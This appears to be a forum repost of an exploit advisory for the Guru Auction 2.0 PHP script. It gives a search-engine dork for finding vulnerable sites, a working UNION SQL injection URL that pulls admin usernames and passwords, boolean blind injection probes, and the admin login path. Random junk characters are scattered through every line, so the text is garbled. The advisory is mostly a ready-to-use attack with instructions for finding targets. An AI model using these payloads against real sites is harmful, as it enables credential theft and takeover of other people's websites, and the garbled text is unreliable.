Guru Auction 2.0 Multiple SQL Injection Vulnerabilities( Q1 E" p0 |5 ^
5 j) d0 t$ x# J' m( j, F$ P0 J
作者 : v3n0m
1 g' U: @ d+ Q b( j应用 : Guru Auction 2.01 m# s. h8 y+ r
Price : $49
, q! D# S% e) M7 \8 xVendor : http://www.guruscript.com/
8 ]" V% D( I; |2 \Google Dork : inurl:subcat.php?cate_id= f5 L; z$ C% `( c& D
" ^2 Q7 ~4 L+ F9 y# _SQLi p0c:
. O7 P" D( G m2 `4 T' _6 b, l~~~~~~~~~~/ ~: O$ j: ^% L* o. [
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
( S5 o1 v( E! A8 @& {! v+ l8 T5 P5 M. t% } 7 x E2 i( Q B3 M6 \; Z+ L O% h
$ z) `, b: ]" s, F
盲注 p0c:
8 H3 `% _& c! Y* N9 B~~~~~~~~~~
% _. H, d0 i' c7 ?9 Ghttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true! s3 }, P& G8 O* U1 [, x$ H
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
8 G- X! n9 ^: F0 ^ ) r; l+ t L/ w" m3 D* o
管理登录入口:- j. B- b2 s7 a( z
~~~~~~~~~~. T0 Z6 G. `6 w% ^) c8 Q0 |
http://domain.tld/[path]/admin/& \* N9 W' d' `$ c
|
发表于 2012-12-31 09:24:05
收藏
支持
反对